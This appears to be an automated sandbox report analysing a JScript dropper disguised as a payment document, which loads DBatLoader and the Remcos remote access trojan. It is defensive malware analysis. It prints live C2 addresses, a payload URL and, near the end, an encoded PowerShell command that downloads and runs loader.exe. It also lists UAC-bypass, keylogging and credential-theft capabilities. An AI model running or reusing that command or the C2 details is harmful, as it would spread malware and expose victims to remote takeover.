Windows Analysis Report
Payment reference no. - FT910298955674.js

Overview

General Information

Sample name: Payment reference no. - FT910298955674.js
Analysis ID: 1649114
MD5: 1ed1e9dce1cb79bc90938280c24114d2
SHA1: ea3c8f8617f060f095d75c2f67ae054def1bfa94
SHA256: ecd14c3cf75fd350c3dbb849d5fea36c8f00d66665a67d1f0ed1d41c8f7a7648
Tags: jsuser-abuse_ch
Infos:

Detection

DBatLoader, Remcos
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Contains functionality to bypass UAC (CMSTPLUA)
Found malware configuration
JScript performs obfuscated calls to suspicious functions
Malicious encrypted Powershell command line found
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected DBatLoader
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
Adds a directory exclusion to Windows Defender
Adds extensions / path to Windows Defender exclusion list (Registry)
Allocates many large memory junks
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionalty to change the wallpaper
Creates a thread in another existing process (thread injection)
Drops PE files with a suspicious file extension
Encrypted powershell cmdline option found
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Powershell drops PE file
Sample has a suspicious name (potential lure to open the executable)
Sigma detected: DLL Search Order Hijackig Via Additional Space in Path
Sigma detected: PowerShell Base64 Encoded Invoke Keyword
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspicious Creation with Colorcpl
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious PowerShell Encoded Command Patterns
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Uses dynamic DNS services
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Execution of Powershell with Base64
Sigma detected: Use Short Name Path in Command Line
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Sigma detected: Windows Defender Exclusions Added - Registry
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Keylogger Generic
Yara signature match

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
Name Description Attribution Blogpost URLs Link
DBatLoader This Delphi loader misuses Cloud storage services, such as Google Drive to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader
Name Description Attribution Blogpost URLs Link
Remcos, RemcosRAT Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
 https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

AV Detection
barindex
Found malware configuration
Source: 00000014.00000002.2203224741.0000000002C30000.00000004.00000020.00020000.00000000.sdmp Malware Configuration Extractor: Remcos {"Host:Port:Password": ["103.186.117.225:9916:0", "bb990a9a6fafe.duckdns.org:6666:0", "103.186.117.225:6666:0"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "makwin-04NDKU", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "mkwain", "Keylog file max size": ""}
Multi AV Scanner detection for submitted file
Source: Payment reference no. - FT910298955674.js Virustotal: Detection: 22% Perma Link
Yara detected Remcos RAT
Source: Yara match File source: 20.2.colorcpl.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.colorcpl.exe.6c70000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.colorcpl.exe.6c71a11.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.colorcpl.exe.6c70000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.colorcpl.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.colorcpl.exe.6c71a11.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000014.00000002.2203224741.0000000002C30000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.2202403194.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.2205275601.0000000006C70000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: colorcpl.exe PID: 7724, type: MEMORYSTR
Source: Yara match File source: C:\ProgramData\mkwain\logs.dat, type: DROPPED
Joe Sandbox ML detected suspicious sample
Source: Submited Sample Neural Call Log Analysis: 100.0%
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_00433B64 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext, 20_2_00433B64
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_06CA4975 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext, 20_2_06CA4975
Source: colorcpl.exe Binary or memory string: -----BEGIN PUBLIC KEY-----

Exploits
barindex
Yara detected UAC Bypass using CMSTP
Source: Yara match File source: 20.2.colorcpl.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.colorcpl.exe.6c70000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.colorcpl.exe.6c71a11.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.colorcpl.exe.6c70000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.colorcpl.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.colorcpl.exe.6c71a11.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000014.00000002.2202403194.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.2205275601.0000000006C70000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: colorcpl.exe PID: 7724, type: MEMORYSTR

Privilege Escalation
barindex
Contains functionality to bypass UAC (CMSTPLUA)
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_00406ABC _wcslen,CoGetObject, 20_2_00406ABC
Source: Binary string: easinvoker.pdb source: loader.exe, 0000000E.00000002.1106214675.0000000020D18000.00000004.00001000.00020000.00000000.sdmp, loader.exe, 0000000E.00000003.1029107436.000000007F980000.00000004.00001000.00020000.00000000.sdmp, loader.exe, 0000000E.00000003.1033797948.000000007ECA3000.00000004.00001000.00020000.00000000.sdmp, loader.exe, 0000000E.00000003.1033797948.000000007EC90000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: easinvoker.pdbGCTL source: loader.exe, 0000000E.00000003.1037350319.000000000074C000.00000004.00000020.00020000.00000000.sdmp, loader.exe, 0000000E.00000002.1106214675.0000000020D18000.00000004.00001000.00020000.00000000.sdmp, loader.exe, 0000000E.00000003.1029107436.000000007F980000.00000004.00001000.00020000.00000000.sdmp, loader.exe, 0000000E.00000003.1033797948.000000007ECA3000.00000004.00001000.00020000.00000000.sdmp, loader.exe, 0000000E.00000003.1037350319.000000000077B000.00000004.00000020.00020000.00000000.sdmp, loader.exe, 0000000E.00000003.1033797948.000000007EC90000.00000004.00001000.00020000.00000000.sdmp

Change of critical system settings
barindex
Adds extensions / path to Windows Defender exclusion list (Registry)
Source: C:\Windows\System32\reg.exe Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths C:\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\loader.exe Code function: 14_2_02FF54D0 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA, 14_2_02FF54D0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_004090DC __EH_prolog,FindFirstFileW,FindNextFileW,FindClose, 20_2_004090DC
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_0040B6B5 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose, 20_2_0040B6B5
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_0041C7E5 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose, 20_2_0041C7E5
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_0040B8BA FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose, 20_2_0040B8BA
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_0044E989 FindFirstFileExA, 20_2_0044E989
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_00408CDE __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8, 20_2_00408CDE
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_00419CEE FindFirstFileW,FindNextFileW,FindNextFileW, 20_2_00419CEE
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_00407EDD __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8, 20_2_00407EDD
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_00406F13 FindFirstFileW,FindNextFileW, 20_2_00406F13
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_06C7C6CB FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose, 20_2_06C7C6CB
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_06C7C4C6 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose, 20_2_06C7C4C6
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_06C78CEE __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8, 20_2_06C78CEE
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_06C8AAFF FindFirstFileW, 20_2_06C8AAFF
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_06CBF79A FindFirstFileExA, 20_2_06CBF79A
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_06C8D5F6 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose, 20_2_06C8D5F6
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_06C79EED __EH_prolog,FindFirstFileW,FindNextFileW,FindClose, 20_2_06C79EED
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_06C77D24 FindFirstFileW,FindNextFileW, 20_2_06C77D24
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_06C79AEF __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8, 20_2_06C79AEF
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_00407357 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW, 20_2_00407357

Software Vulnerabilities
barindex
Suspicious execution chain found
Source: C:\Windows\System32\wscript.exe Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Networking
barindex
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: bb990a9a6fafe.duckdns.org
Source: Malware configuration extractor IPs: 103.186.117.225
Source: Malware configuration extractor IPs: 103.186.117.225
Uses dynamic DNS services
Source: unknown DNS query: name: bb990a9a6fafe.duckdns.org
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.7:49687 -> 103.186.117.225:9916
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 185.208.156.66 185.208.156.66
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: AARNET-AS-APAustralianAcademicandResearchNetworkAARNe AARNET-AS-APAustralianAcademicandResearchNetworkAARNe
Suricata IDS alerts with low severity for network traffic
Source: Network traffic Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.7:49681 -> 185.208.156.66:80
Source: Network traffic Suricata IDS: 1810003 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP PE File Download : 185.208.156.66:80 -> 192.168.2.7:49681
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /file/loader.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.nawatbsc.comConnection: Keep-Alive
Source: unknown TCP traffic detected without corresponding DNS query: 103.186.117.225
Source: unknown TCP traffic detected without corresponding DNS query: 103.186.117.225
Source: unknown TCP traffic detected without corresponding DNS query: 103.186.117.225
Source: unknown TCP traffic detected without corresponding DNS query: 103.186.117.225
Source: unknown TCP traffic detected without corresponding DNS query: 103.186.117.225
Source: unknown TCP traffic detected without corresponding DNS query: 103.186.117.225
Source: unknown TCP traffic detected without corresponding DNS query: 103.186.117.225
Source: unknown TCP traffic detected without corresponding DNS query: 103.186.117.225
Source: unknown TCP traffic detected without corresponding DNS query: 103.186.117.225
Source: unknown TCP traffic detected without corresponding DNS query: 103.186.117.225
Source: unknown TCP traffic detected without corresponding DNS query: 103.186.117.225
Source: unknown TCP traffic detected without corresponding DNS query: 103.186.117.225
Source: unknown TCP traffic detected without corresponding DNS query: 103.186.117.225
Source: unknown TCP traffic detected without corresponding DNS query: 103.186.117.225
Source: unknown TCP traffic detected without corresponding DNS query: 103.186.117.225
Source: unknown TCP traffic detected without corresponding DNS query: 103.186.117.225
Source: unknown TCP traffic detected without corresponding DNS query: 103.186.117.225
Source: unknown TCP traffic detected without corresponding DNS query: 103.186.117.225
Source: unknown TCP traffic detected without corresponding DNS query: 103.186.117.225
Source: unknown TCP traffic detected without corresponding DNS query: 103.186.117.225
Source: unknown TCP traffic detected without corresponding DNS query: 103.186.117.225
Source: unknown TCP traffic detected without corresponding DNS query: 103.186.117.225
Source: unknown TCP traffic detected without corresponding DNS query: 103.186.117.225
Source: unknown TCP traffic detected without corresponding DNS query: 103.186.117.225
Source: unknown TCP traffic detected without corresponding DNS query: 103.186.117.225
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_004062E2 ShellExecuteW,URLDownloadToFileW, 20_2_004062E2
Source: global traffic HTTP traffic detected: GET /file/loader.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.nawatbsc.comConnection: Keep-Alive
Source: global traffic DNS traffic detected: DNS query: www.nawatbsc.com
Source: global traffic DNS traffic detected: DNS query: bb990a9a6fafe.duckdns.org
Source: powershell.exe, 00000009.00000002.1262106263.000002C4F9D0E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.mC5Pys
Source: powershell.exe, 0000000B.00000002.1089379408.000001CC579D5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.mi8
Source: powershell.exe, 00000007.00000002.954970149.00000193B0E39000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.v
Source: svchost.exe, 00000016.00000002.2207105706.0000024031200000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.ver)
Source: qmgr.db.22.dr String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: qmgr.db.22.dr String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: qmgr.db.22.dr String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: qmgr.db.22.dr String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: qmgr.db.22.dr String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: qmgr.db.22.dr String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: edb.log.22.dr String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: colorcpl.exe String found in binary or memory: http://geoplugin.net/json.gp
Source: colorcpl.exe, 00000014.00000002.2202403194.0000000000400000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000014.00000002.2205275601.0000000006C70000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/json.gp/C
Source: powershell.exe, 00000009.00000002.1250972115.000002C4F1D43000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1250972115.000002C4F1E86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1050453582.000001CC4F654000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000000B.00000002.980997999.000001CC3F808000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 0000000B.00000002.980997999.000001CC3F808000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000005.00000002.1163170909.000001E41A79F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.952695151.0000019398D4F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1013066820.000002C4E1CD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.980997999.000001CC3F5E1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000000B.00000002.980997999.000001CC3F808000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 0000000B.00000002.980997999.000001CC3F808000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 0000000B.00000002.1088984280.000001CC57800000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.microsoft.co
Source: powershell.exe, 00000009.00000002.1013066820.000002C4E32B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1013066820.000002C4E2902000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.nawatbsc.com
Source: powershell.exe, 00000009.00000002.1013066820.000002C4E1F02000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1013066820.000002C4E2902000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1013066820.000002C4E1CD1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.nawatbsc.com/file/loader.exe
Source: loader.exe, 0000000E.00000002.1106214675.0000000020D94000.00000004.00001000.00020000.00000000.sdmp, loader.exe, 0000000E.00000003.1033797948.000000007ECA3000.00000004.00001000.00020000.00000000.sdmp, loader.exe, 0000000E.00000002.1132324849.000000007EDDF000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.pmail.com
Source: powershell.exe, 00000005.00000002.1163170909.000001E41A774000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1163170909.000001E41A75F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.952695151.0000019398D24000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.952695151.0000019398D0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1013066820.000002C4E1CD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.980997999.000001CC3F5E1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 0000000B.00000002.1050453582.000001CC4F654000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000B.00000002.1050453582.000001CC4F654000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000B.00000002.1050453582.000001CC4F654000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: edb.log.22.dr String found in binary or memory: https://g.live.com/odclientsettings/Prod1C:
Source: svchost.exe, 00000016.00000003.1217672425.0000024031090000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.22.dr, edb.log.22.dr String found in binary or memory: https://g.live.com/odclientsettings/ProdV21C:
Source: powershell.exe, 0000000B.00000002.980997999.000001CC3F808000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000009.00000002.1013066820.000002C4E2902000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://go.micro
Source: powershell.exe, 00000009.00000002.1265831190.000002C4F9F10000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://go.microsoft.c
Source: powershell.exe, 00000009.00000002.1250972115.000002C4F1D43000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1250972115.000002C4F1E86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1050453582.000001CC4F654000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: qmgr.db.22.dr String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe1C:

Key, Mouse, Clipboard, Microphone and Screen Capturing
barindex
Contains functionality to register a low level keyboard hook
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_00409D1E SetWindowsHookExA 0000000D,00409D0A,00000000 20_2_00409D1E
Contains functionality for read data from the clipboard
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_0040B158 OpenClipboard,GetClipboardData,CloseClipboard, 20_2_0040B158
Contains functionality to modify clipboard data
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_0041696E OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard, 20_2_0041696E
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_06C8777F OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard, 20_2_06C8777F
Contains functionality to read the clipboard data
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_0040B158 OpenClipboard,GetClipboardData,CloseClipboard, 20_2_0040B158
Contains functionality to retrieve information about pressed keystrokes
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_00409E4A GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx, 20_2_00409E4A
Yara detected Keylogger Generic
Source: Yara match File source: 20.2.colorcpl.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.colorcpl.exe.6c70000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.colorcpl.exe.6c71a11.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.colorcpl.exe.6c70000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.colorcpl.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.colorcpl.exe.6c71a11.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000014.00000002.2202403194.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.2205275601.0000000006C70000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: loader.exe PID: 7480, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: colorcpl.exe PID: 7724, type: MEMORYSTR

E-Banking Fraud
barindex
Malicious encrypted Powershell command line found
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc JAB1AHIAbAAgAD0AIAAiAGgAdAB0AHAAOgAvAC8AdwB3AHcALgBuAGEAdwBhAHQAYgBzAGMALgBjAG8AbQAvAGYAaQBsAGUALwBsAG8AYQBkAGUAcgAuAGUAeABlACIACgAkAG8AdQB0AHAAdQB0ACAAPQAgACIAJABlAG4AdgA6AFQAZQBtAHAALwBsAG8AYQBkAGUAcgAuAGUAeABlACIACgBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAbAAgAC0ATwB1AHQARgBpAGwAZQAgACQAbwB1AHQAcAB1AHQACgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAAkAG8AdQB0AHAAdQB0AA==
